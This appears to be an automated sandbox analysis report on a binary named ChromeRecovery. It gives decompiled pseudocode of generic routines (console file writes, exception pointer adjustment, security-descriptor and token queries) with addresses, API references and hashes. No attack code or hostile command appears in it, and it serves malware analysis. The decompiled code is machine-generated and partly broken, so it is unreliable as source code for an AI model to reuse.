									_v48 = (_t281 == 4) + 1;
									_t238 = E00C90A8D( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t317 = _t316 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t301 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0xca8788)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t303) {
									__eflags = _t303;
									if(_t303 > 0) {
										_t248 = _v52;
										_t311 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t296 =  *(0xca9720 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											 *((char*)(_t296 + _t311 + 0x2e)) = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t303;
										} while (_t267 < _t303);
										L43:
										_t308 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t308 + 4)) + _t303;
								} else {
									_t287 = _v48;
									_t304 = _t267;
									_t312 = _v80;
									do {
										 *((char*)(_t314 + _t304 - 0x18)) =  *_t312;
										_t304 =  &(_t304->Internal);
										_t312 = _t312 + 1;
									} while (_t304 < _t287);
									_t305 = _v76;
									if(_v76 > 0) {
										E00C80C10( &_v28 + _t287, _t292, _t305);
										_t287 = _v48;
										_t316 = _t316 + 0xc;
									}
									_t301 = _v72;
									_t297 = _t267;
									_t313 = _v84;
									do {
										 *( *((intOrPtr*)(0xca9720 + _t313 * 4)) + _t301 + _t297 + 0x2e) = _t267;
										_t297 =  &(_t297->Internal);
									} while (_t297 < _t287);
									_t308 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00C90A8D( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t317 = _t316 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00C8A5AE(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t316 = _t317 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t308 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t308 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t308 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t308 + 8)) =  *((intOrPtr*)(_t308 + 8)) + 1;
																 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t308 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t308 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				return E00C7F35B(_v20 ^ _t314);
				goto L52;
			}

0x00c8df46
0x00c8df48
0x00c8df53
0x00c8df54
0x00c8df57
0x00c8df5c
0x00c8df5e
0x00c8df64
0x00c8df68
0x00c8df6e
0x00c8df73
0x00c8df79
0x00c8df7c
0x00c8df7f
0x00c8df82
0x00c8df85
0x00c8df88
0x00c8df92
0x00c8df99
0x00c8dfa1
0x00c8dfa4
0x00c8dfaa
0x00c8dfae
0x00c8dfb1
0x00c8dfb5
0x00c8dfb5
0x00c8dfbd
0x00c8dfc5
0x00c8dfca
0x00c8dfcb
0x00c8dfcc
0x00c8dfcd
0x00c8dfd0
0x00c8dfd2
0x00c8dfd8
0x00c8dfde
0x00c8dfe1
0x00c8dfe3
0x00c8dfe6
0x00c8dfef
0x00c8dff5
0x00c8dff8
0x00c8dfff
0x00c8e006
0x00c8e009
0x00c8e143
0x00c8e147
0x00c8e14a
0x00c8e16d
0x00c8e173
0x00c8e175
0x00c8e179
0x00c8e1aa
0x00c8e1ad
0x00c8e1af
0x00000000
0x00c8e17b
0x00c8e17b
0x00c8e17e
0x00c8e181
0x00c8e184
0x00c8e2ce
0x00c8e2dc
0x00c8e2e5
0x00c8e18a
0x00c8e194
0x00c8e199
0x00c8e19c
0x00c8e19f
0x00c8e1a5
0x00000000
0x00c8e1a5
0x00c8e19f
0x00c8e184
0x00c8e14c
0x00c8e153
0x00c8e156
0x00c8e159
0x00c8e15b
0x00c8e15e
0x00c8e165
0x00c8e167
0x00c8e1b0
0x00c8e1b3
0x00c8e1b4
0x00c8e1b9
0x00c8e1bc
0x00c8e1bf
0x00c8e1c5
0x00000000
0x00c8e1c5
0x00c8e1bf
0x00c8e00f
0x00c8e012
0x00c8e014
0x00c8e016
0x00c8e01a
0x00c8e01b
0x00c8e01f
0x00000000
0x00000000
0x00000000
0x00c8e01f
0x00c8e024
0x00c8e026
0x00c8e02b
0x00c8e0eb
0x00c8e0f2
0x00c8e0f3
0x00c8e0f6
0x00c8e0f8
0x00c8e2a8
0x00c8e2aa
0x00000000
0x00c8e2ac
0x00c8e2ac
0x00c8e2af
0x00c8e2be
0x00c8e2c2
0x00c8e2c3
0x00c8e2c3
0x00000000
0x00c8e2c7
0x00000000
0x00c8e0fe
0x00c8e103
0x00c8e106
0x00c8e109
0x00c8e10f
0x00c8e118
0x00c8e123
0x00c8e128
0x00c8e12b
0x00c8e12e
0x00c8e137
0x00c8e137
0x00c8e13a
0x00000000
0x00c8e13a
0x00c8e12e
0x00c8e031
0x00c8e034
0x00c8e03a
0x00c8e03c
0x00c8e049
0x00c8e04a
0x00c8e04d
0x00c8e050
0x00c8e055
0x00c8e279
0x00c8e27b
0x00c8e27d
0x00c8e280
0x00c8e283
0x00c8e28f
0x00c8e292
0x00c8e294
0x00c8e295
0x00c8e299
0x00c8e29c
0x00c8e29c
0x00c8e2a0
0x00c8e2a0
0x00c8e2a0
0x00c8e2a3
0x00c8e2a3
0x00c8e05b
0x00c8e05b
0x00c8e05e
0x00c8e060
0x00c8e063
0x00c8e065
0x00c8e069
0x00c8e06a
0x00c8e06b
0x00c8e06f
0x00c8e074
0x00c8e07e
0x00c8e083
0x00c8e086
0x00c8e086
0x00c8e089
0x00c8e08c
0x00c8e08e
0x00c8e091
0x00c8e09a
0x00c8e09e
0x00c8e09f
0x00c8e0a6
0x00c8e0ac
0x00c8e0b4
0x00c8e0bf
0x00c8e0c4
0x00c8e0cf
0x00c8e0d4
0x00c8e0da
0x00c8e0e3
0x00c8e13d
0x00c8e13d
0x00c8e1c8
0x00c8e1cd
0x00c8e1df
0x00c8e1e4
0x00c8e1e7
0x00c8e1ec
0x00c8e207
0x00c8e2ea
0x00c8e2f0
0x00c8e20d
0x00c8e20d
0x00c8e218
0x00c8e21a
0x00c8e21d
0x00c8e226
0x00c8e230
0x00000000
0x00c8e232
0x00c8e234
0x00c8e236
0x00c8e24f
0x00000000
0x00c8e255
0x00c8e259
0x00c8e25f
0x00c8e262
0x00c8e268
0x00c8e26b
0x00000000
0x00c8e26b
0x00c8e259
0x00c8e24f
0x00c8e230
0x00c8e226
0x00c8e207
0x00c8e1ec
0x00c8e0da
0x00c8e055
0x00c8e02b
0x00000000
0x00c8e26e
0x00c8e26e
0x00c8e277
0x00c8e2f2
0x00c8e2f7
0x00c8e30d
0x00000000

APIs

GetConsoleOutputCP.KERNEL32 ref: 00C8DFA4

Part of subcall function 00C8A5AE: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9), ref: 00C8A65A

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8E1FF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C8E247
GetLastError.KERNEL32 ref: 00C8E2EA

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: efa3be35bb7af58df18c016dc0bbf4dba895b1b39d914e91b557b870763de622
Instruction ID: aec4e289d12a46b492395c407a30ef732c97671c7a5c1cc180b7dd858562d3a7
Opcode Fuzzy Hash: efa3be35bb7af58df18c016dc0bbf4dba895b1b39d914e91b557b870763de622
Instruction Fuzzy Hash: C5D18AB5D002589FCF15DFE8D880AADBBB8FF49318F18452AE826E7351D730A942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C81FC4 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00C81FC4(void* __eflags) {
				signed char* _t52;
				signed int _t53;
				signed int _t57;
				signed int _t60;
				intOrPtr _t70;
				signed int _t73;
				signed int _t77;
				signed char _t79;
				signed char _t82;
				signed int _t83;
				signed int _t84;
				signed char _t96;
				signed int* _t97;
				signed char* _t99;
				signed int _t104;
				void* _t108;

				E00C7FE60(0xca6720, 0x10);
				_t73 = 0;
				_t52 =  *(_t108 + 0x10);
				_t79 = _t52[4];
				if(_t79 == 0 ||  *((intOrPtr*)(_t79 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t82 = _t52[8];
					if(_t82 != 0 ||  *_t52 < 0) {
						_t96 =  *_t52;
						_t104 =  *(_t108 + 0xc);
						if(_t96 >= 0) {
							_t104 = _t104 + 0xc + _t82;
						}
						 *(_t108 - 4) = _t73;
						_t99 =  *(_t108 + 0x14);
						if(_t96 >= 0 || ( *_t99 & 0x00000010) == 0) {
							L10:
							_t83 =  *(_t108 + 8);
							__eflags = _t96 & 0x00000008;
							if(__eflags == 0) {
								__eflags =  *_t99 & 0x00000001;
								if(( *_t99 & 0x00000001) == 0) {
									_t83 =  *(_t83 + 0x18);
									__eflags = _t99[0x18] - _t73;
									if(_t99[0x18] != _t73) {
										__eflags = _t83;
										if(__eflags == 0) {
											goto L32;
										} else {
											__eflags = _t104;
											if(__eflags == 0) {
												goto L32;
											} else {
												__eflags =  *_t99 & 0x00000004;
												_t77 = 0;
												_t73 = (_t77 & 0xffffff00 | ( *_t99 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t73;
												 *(_t108 - 0x20) = _t73;
												goto L29;
											}
										}
									} else {
										__eflags = _t83;
										if(__eflags == 0) {
											goto L32;
										} else {
											__eflags = _t104;
											if(__eflags == 0) {
												goto L32;
											} else {
												E00C80690(_t104, E00C82FEF(_t83,  &(_t99[8])), _t99[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t83 + 0x18);
									if(__eflags == 0) {
										goto L32;
									} else {
										__eflags = _t104;
										if(__eflags == 0) {
											goto L32;
										} else {
											E00C80690(_t104,  *(_t83 + 0x18), _t99[0x14]);
											__eflags = _t99[0x14] - 4;
											if(_t99[0x14] == 4) {
												__eflags =  *_t104;
												if( *_t104 != 0) {
													_push( &(_t99[8]));
													_push( *_t104);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t83 =  *(_t83 + 0x18);
								goto L12;
							}
						} else {
							_t70 =  *0xca924c; // 0x0
							 *((intOrPtr*)(_t108 - 0x1c)) = _t70;
							if(_t70 == 0) {
								goto L10;
							} else {
								 *0xc97348();
								_t83 =  *((intOrPtr*)(_t108 - 0x1c))();
								L12:
								if(_t83 == 0 || _t104 == 0) {
									L32:
									E00C84C30(_t73, _t83, _t96, _t99, _t104, __eflags);
									asm("int3");
									E00C7FE60(0xca6740, 8);
									_t97 =  *(_t108 + 0x10);
									_t84 =  *(_t108 + 0xc);
									__eflags =  *_t97;
									if(__eflags >= 0) {
										_t101 = _t84 + 0xc + _t97[2];
										__eflags = _t84 + 0xc + _t97[2];
									} else {
										_t101 = _t84;
									}
									 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
									_t105 =  *(_t108 + 0x14);
									_push( *(_t108 + 0x14));
									_push(_t97);
									_push(_t84);
									_t75 =  *(_t108 + 8);
									_push( *(_t108 + 8));
									_t57 = E00C81FC4(__eflags) - 1;
									__eflags = _t57;
									if(_t57 == 0) {
										_t60 = E00C82CB4(_t101, _t105[0x18], E00C82FEF( *((intOrPtr*)(_t75 + 0x18)),  &(_t105[8])));
									} else {
										_t60 = _t57 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t60 = E00C82CC4(_t101, _t105[0x18], E00C82FEF( *((intOrPtr*)(_t75 + 0x18)),  &(_t105[8])), 1);
										}
									}
									 *(_t108 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t60;
								} else {
									 *_t104 = _t83;
									_push( &(_t99[8]));
									_push(_t83);
									L21:
									 *_t104 = E00C82FEF();
									L29:
									 *(_t108 - 4) = 0xfffffffe;
									_t53 = _t73;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00c81fcb
0x00c81fd0
0x00c81fd2
0x00c81fd5
0x00c81fda
0x00c820ea
0x00c820ea
0x00c820ea
0x00000000
0x00c81fe9
0x00c81fe9
0x00c81fee
0x00c81ff8
0x00c81ffa
0x00c81fff
0x00c82004
0x00c82004
0x00c82006
0x00c82009
0x00c8200e
0x00c82030
0x00c82030
0x00c82033
0x00c82036
0x00c82054
0x00c82057
0x00c82096
0x00c82099
0x00c8209c
0x00c820c1
0x00c820c3
0x00000000
0x00c820c5
0x00c820c5
0x00c820c7
0x00000000
0x00c820c9
0x00c820c9
0x00c820ce
0x00c820d2
0x00c820d2
0x00c820d3
0x00000000
0x00c820d3
0x00c820c7
0x00c8209e
0x00c8209e
0x00c820a0
0x00000000
0x00c820a2
0x00c820a2
0x00c820a4
0x00000000
0x00c820a6
0x00c820b7
0x00000000
0x00c820bc
0x00c820a4
0x00c820a0
0x00c82059
0x00c82059
0x00c8205d
0x00000000
0x00c82063
0x00c82063
0x00c82065
0x00000000
0x00c8206b
0x00c82072
0x00c8207a
0x00c8207e
0x00c82080
0x00c82083
0x00c82088
0x00c82089
0x00000000
0x00c82089
0x00c82083
0x00000000
0x00c8207e
0x00c82065
0x00c8205d
0x00c82038
0x00c82038
0x00000000
0x00c82038
0x00c82015
0x00c82015
0x00c8201a
0x00c8201f
0x00000000
0x00c82021
0x00c82023
0x00c8202c
0x00c8203b
0x00c8203d
0x00c820fc
0x00c820fc
0x00c82101
0x00c82109
0x00c8210e
0x00c82111
0x00c82114
0x00c82117
0x00c82120
0x00c82120
0x00c82119
0x00c82119
0x00c82119
0x00c82123
0x00c82127
0x00c8212a
0x00c8212b
0x00c8212c
0x00c8212d
0x00c82130
0x00c82139
0x00c82139
0x00c8213c
0x00c82172
0x00c8213e
0x00c8213e
0x00c8213e
0x00c82141
0x00c82158
0x00c82158
0x00c82141
0x00c82177
0x00c82181
0x00c8218d
0x00c8204b
0x00c8204b
0x00c82050
0x00c82051
0x00c8208b
0x00c82092
0x00c820d6
0x00c820d6
0x00c820dd
0x00c820ec
0x00c820ef
0x00c820fb
0x00c820fb
0x00c8203d
0x00c8201f
0x00000000
0x00000000
0x00000000
0x00c81fee

APIs

___AdjustPointer.LIBCMT ref: 00C8208B
___AdjustPointer.LIBCMT ref: 00C820AE
___AdjustPointer.LIBCMT ref: 00C8214A

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2e1291e4c138f6a1bafad5b79dc49a39a9714bdaab723cbb001590ad8fd9787f
Instruction ID: 6b654865b10b5678ff17473767f6f139f2bae025671f45a821cc09fd044be75c
Opcode Fuzzy Hash: 2e1291e4c138f6a1bafad5b79dc49a39a9714bdaab723cbb001590ad8fd9787f
Instruction Fuzzy Hash: 4E510572605202AFEB29AF50D849B7A77B5FF04308F24412DED1587281D732AD82E798

Uniqueness

Uniqueness Score: -1.00%

Function 00C75AB2 Relevance: 6.2, APIs: 4, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00C75AB2(struct _SECURITY_DESCRIPTOR* __ebx, DWORD* __ecx, void* __edi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				struct _SECURITY_DESCRIPTOR* _v24;
				void* _v28;
				long _v32;
				long _v36;
				short _v40;
				signed char _v60;
				void* __ebp;
				int _t58;
				struct _SECURITY_DESCRIPTOR* _t63;
				int _t68;
				long _t79;
				struct _ACL* _t85;
				struct _ACL* _t89;
				DWORD* _t95;
				intOrPtr* _t96;
				void* _t108;
				DWORD* _t110;
				DWORD* _t112;
				struct _ACL* _t115;
				intOrPtr* _t116;
				void* _t121;
				void* _t125;
				void* _t126;

				_t95 = __ecx;
				_t93 = __ebx;
				_t121 = _t125;
				_t126 = _t125 - 0x24;
				_t110 = __ecx;
				if(__ecx[1] == 0) {
					L28:
					return _t58;
				} else {
					_t115 = 0;
					_v40 = 0;
					_t58 = GetSecurityDescriptorControl(__ecx[1],  &_v40,  &_v32);
					if(_t58 == 0) {
						_push(0x80004005);
						goto L32;
					} else {
						if((_v40 & 0x00008000) == 0) {
							L27:
							goto L28;
						} else {
							_v20 = 0;
							_v16 = 0;
							_v8 = 0;
							_v12 = 0;
							_v36 = 0;
							MakeAbsoluteSD( *(_t110 + 4), 0,  &_v36, 0,  &_v16, 0,  &_v20, 0,  &_v12, 0,  &_v8);
							if(GetLastError() != 0x7a) {
								L33:
								E00C7239D(_t93, _t95, _t108);
								asm("int3");
								_push(_t115);
								_push(_t110);
								_t112 = _t95;
								_t63 = E00C83B1B();
								_t112[1] = _t63;
								_t96 = 0x14;
								if(_t63 == 0) {
									_push(0x8007000e);
									goto L39;
								} else {
									_t68 = InitializeSecurityDescriptor(_t63, 1);
									if(_t68 != 0) {
										return _t68;
									} else {
										_t115 = E00C72482();
										E00C83557(_t112[1]);
										_t112[1] = _t112[1] & 0x00000000;
										_pop(_t96);
										_push(_t115);
										L39:
										E00C71185(_t96);
										asm("int3");
										_push(_t121);
										_push(_t115);
										_t116 = _t96;
										 *_t116 = 0xca41c0;
										E00C77F74(_t96);
										if((_v60 & 0x00000001) != 0) {
											_push(0xc);
											E00C7F62D(_t116);
										}
										return _t116;
									}
								}
							} else {
								_push(__ebx);
								_push(_v36);
								_t93 = E00C83B1B();
								if(_v12 == 0) {
									_v24 = 0;
								} else {
									_push(_v12);
									_v24 = E00C83B1B();
								}
								if(_v8 == _t115) {
									_v28 = _t115;
								} else {
									_push(_v8);
									_v28 = E00C83B1B();
								}
								_t79 = _v16;
								if(_t79 == 0) {
									_v32 = _t115;
								} else {
									_push(_t79);
									_v32 = E00C83B1B();
									_t79 = _v16;
								}
								_t95 = _v20;
								if(_t95 != 0) {
									_push(_t95);
									_t89 = E00C83B1B();
									_t95 = _v20;
									_t115 = _t89;
									_t79 = _v16;
								}
								if(_t93 == 0 || _v12 != 0 && _v24 == 0) {
									L29:
									_t110 = 0x8007000e;
									goto L30;
								} else {
									_t108 = _v28;
									if(_v8 == 0 || _t108 != 0) {
										_t85 = _v32;
										if(_t79 == 0 || _t85 != 0) {
											if(_t95 == 0 || _t115 != 0) {
												_t95 =  &_v16;
												if(MakeAbsoluteSD( *(_t110 + 4), _t93,  &_v36, _t85, _t95, _t115,  &_v20, _v24,  &_v12, _t108,  &_v8) != 0) {
													_t58 = E00C72C7E(_t110);
													 *(_t110 + 4) = _t93;
													goto L27;
												} else {
													_t110 = E00C72482();
													L30:
													E00C83557(_t93);
													E00C83557(_v24);
													E00C83557(_v28);
													E00C83557(_v32);
													E00C83557(_t115);
													_t126 = _t126 + 0x14;
													_push(_t110);
													L32:
													E00C71185(_t95);
													goto L33;
												}
											} else {
												goto L29;
											}
										} else {
											goto L29;
										}
									} else {
										goto L29;
									}
								}
							}
						}
					}
				}
			}

0x00c75ab2
0x00c75ab2
0x00c75ab3
0x00c75ab5
0x00c75ab9
0x00c75abf
0x00c75c05
0x00c75c07
0x00c75ac5
0x00c75ac9
0x00c75acf
0x00c75ad6
0x00c75ade
0x00c75c37
0x00000000
0x00c75ae4
0x00c75aeb
0x00c75c04
0x00000000
0x00c75af1
0x00c75af4
0x00c75afc
0x00c75b04
0x00c75b0c
0x00c75b14
0x00c75b1c
0x00c75b2b
0x00c75c41
0x00c75c41
0x00c75c46
0x00c75c47
0x00c75c48
0x00c75c4b
0x00c75c4d
0x00c75c52
0x00c75c55
0x00c75c58
0x00c75c81
0x00000000
0x00c75c5a
0x00c75c5d
0x00c75c65
0x00c75c80
0x00c75c67
0x00c75c6f
0x00c75c71
0x00c75c76
0x00c75c7a
0x00c75c7b
0x00c75c86
0x00c75c86
0x00c75c8b
0x00c75c8c
0x00c75c8f
0x00c75c90
0x00c75c92
0x00c75c98
0x00c75ca1
0x00c75ca3
0x00c75ca6
0x00c75cac
0x00c75cb1
0x00c75cb1
0x00c75c65
0x00c75b31
0x00c75b31
0x00c75b32
0x00c75b3a
0x00c75b40
0x00c75b50
0x00c75b42
0x00c75b42
0x00c75b4b
0x00c75b4b
0x00c75b56
0x00c75b66
0x00c75b58
0x00c75b58
0x00c75b61
0x00c75b61
0x00c75b69
0x00c75b6e
0x00c75b7f
0x00c75b70
0x00c75b70
0x00c75b76
0x00c75b79
0x00c75b7c
0x00c75b82
0x00c75b87
0x00c75b89
0x00c75b8a
0x00c75b90
0x00c75b93
0x00c75b95
0x00c75b95
0x00c75b9a
0x00c75c08
0x00c75c08
0x00000000
0x00c75ba8
0x00c75bac
0x00c75baf
0x00c75bb7
0x00c75bba
0x00c75bc2
0x00c75bd9
0x00c75bee
0x00c75bfb
0x00c75c00
0x00000000
0x00c75bf0
0x00c75bf5
0x00c75c0d
0x00c75c0e
0x00c75c16
0x00c75c1e
0x00c75c26
0x00c75c2c
0x00c75c31
0x00c75c34
0x00c75c3c
0x00c75c3c
0x00000000
0x00c75c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c75baf
0x00c75b9a
0x00c75b2b
0x00c75aeb
0x00c75ade

APIs

GetSecurityDescriptorControl.ADVAPI32 ref: 00C75AD6
MakeAbsoluteSD.ADVAPI32 ref: 00C75B1C
GetLastError.KERNEL32 ref: 00C75B22
MakeAbsoluteSD.ADVAPI32 ref: 00C75BE6

Part of subcall function 00C72C7E: GetSecurityDescriptorControl.ADVAPI32 ref: 00C72CA0
Part of subcall function 00C72C7E: GetSecurityDescriptorOwner.ADVAPI32 ref: 00C72CC2
Part of subcall function 00C72C7E: GetSecurityDescriptorGroup.ADVAPI32 ref: 00C72CDC
Part of subcall function 00C72C7E: GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,00C75C00), ref: 00C72CFA
Part of subcall function 00C72C7E: GetSecurityDescriptorSacl.ADVAPI32 ref: 00C72D1E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DescriptorSecurity$AbsoluteControlMake$DaclErrorGroupLastOwnerSacl
String ID:
API String ID: 2915467597-0
Opcode ID: 1fb490a628ec08dca4c9bf293a3f217c956a2c7c65568068c902ef6e137d8d58
Instruction ID: cbf5af0665f7df87b578036b30b8d4d5d44b02c3f47293ff2d3087eaea1d6ea1
Opcode Fuzzy Hash: 1fb490a628ec08dca4c9bf293a3f217c956a2c7c65568068c902ef6e137d8d58
Instruction Fuzzy Hash: CC512AB1D01619AFDB15EBA5CD45AFFBBB8FF08B04F14812AE429A2150D7709B40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C76A13 Relevance: 6.1, APIs: 4, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00C76A13(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v32;
				void* __ebp;
				signed int _t19;
				long _t26;
				void* _t27;
				void* _t35;
				void* _t37;
				void* _t47;
				void* _t48;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;

				_t47 = __edi;
				_t19 =  *0xca8008; // 0x617e0cdd
				_v8 = _t19 ^ _t52;
				_v20 = __ecx;
				if(_a4 == 0) {
					L12:
					__eflags = 0;
					L13:
					return E00C7F35B(_v8 ^ _t52);
				}
				_t37 = 0;
				GetTokenInformation( *(__ecx + 4), 6, 0, 0,  &_v12);
				if(GetLastError() != 0x7a) {
					goto L12;
				}
				_t26 = _v12;
				_t51 = 0;
				_v16 = 0;
				_t57 = _t26 - 0x400;
				if(_t26 > 0x400) {
					L5:
					_push(_t26);
					_t27 = L00C74F66(_t37,  &_v16, _t47, _t51);
					_t51 = _v16;
					_t48 = _t27;
					L6:
					if(_t48 != 0 && GetTokenInformation( *(_v20 + 4), 6, _t48, _v12,  &_v12) != 0) {
						E00C72969(_a4);
						_push( *_t48);
						E00C7544A(_t37, _a4,  *_t48);
						_t37 = 1;
					}
					while(_t51 != 0) {
						_t51 =  *_t51;
						E00C83557(_t51);
					}
					goto L13;
				}
				_t35 = E00C74B82(_t26, _t57);
				_t26 = _v12;
				if(_t35 == 0) {
					goto L5;
				}
				E00C93B80();
				_t48 = _t53;
				goto L6;
			}

0x00c76a13
0x00c76a19
0x00c76a20
0x00c76a2c
0x00c76a2f
0x00c76acd
0x00c76acd
0x00c76acf
0x00c76ae0
0x00c76ae0
0x00c76a38
0x00c76a42
0x00c76a51
0x00000000
0x00000000
0x00c76a53
0x00c76a56
0x00c76a58
0x00c76a5b
0x00c76a60
0x00c76a79
0x00c76a79
0x00c76a7d
0x00c76a82
0x00c76a85
0x00c76a87
0x00c76a89
0x00c76aaa
0x00c76ab2
0x00c76ab3
0x00c76ab8
0x00c76ab8
0x00c76ac5
0x00c76abd
0x00c76abf
0x00c76ac4
0x00000000
0x00c76ac9
0x00c76a64
0x00c76a6b
0x00c76a6e
0x00000000
0x00000000
0x00c76a70
0x00c76a75
0x00000000

APIs

GetTokenInformation.ADVAPI32(00000000,00000006,00000000,00000000,00000000), ref: 00C76A42
GetLastError.KERNEL32 ref: 00C76A48
GetTokenInformation.ADVAPI32(?,00000006,00000000,00000000,00000000), ref: 00C76A9B

Part of subcall function 00C74B82: __alloca_probe_16.LIBCMT ref: 00C74BA5

__alloca_probe_16.LIBCMT ref: 00C76A70

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: InformationToken__alloca_probe_16$ErrorLast
String ID:
API String ID: 434645856-0
Opcode ID: a6e8577092e9544e659c939d218a1fc6506a114a3ce0edabfc04645b713510c0
Instruction ID: ae3ad23d27decb4ead6d9c4e6652bddfc28c36ae730b80f46d072283f14780e7
Opcode Fuzzy Hash: a6e8577092e9544e659c939d218a1fc6506a114a3ce0edabfc04645b713510c0
Instruction Fuzzy Hash: C9217F31A00508AFDF10AFA5C855ABEB7B8EF44764F18C069F419A7250DB30AE55EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C76AE3 Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

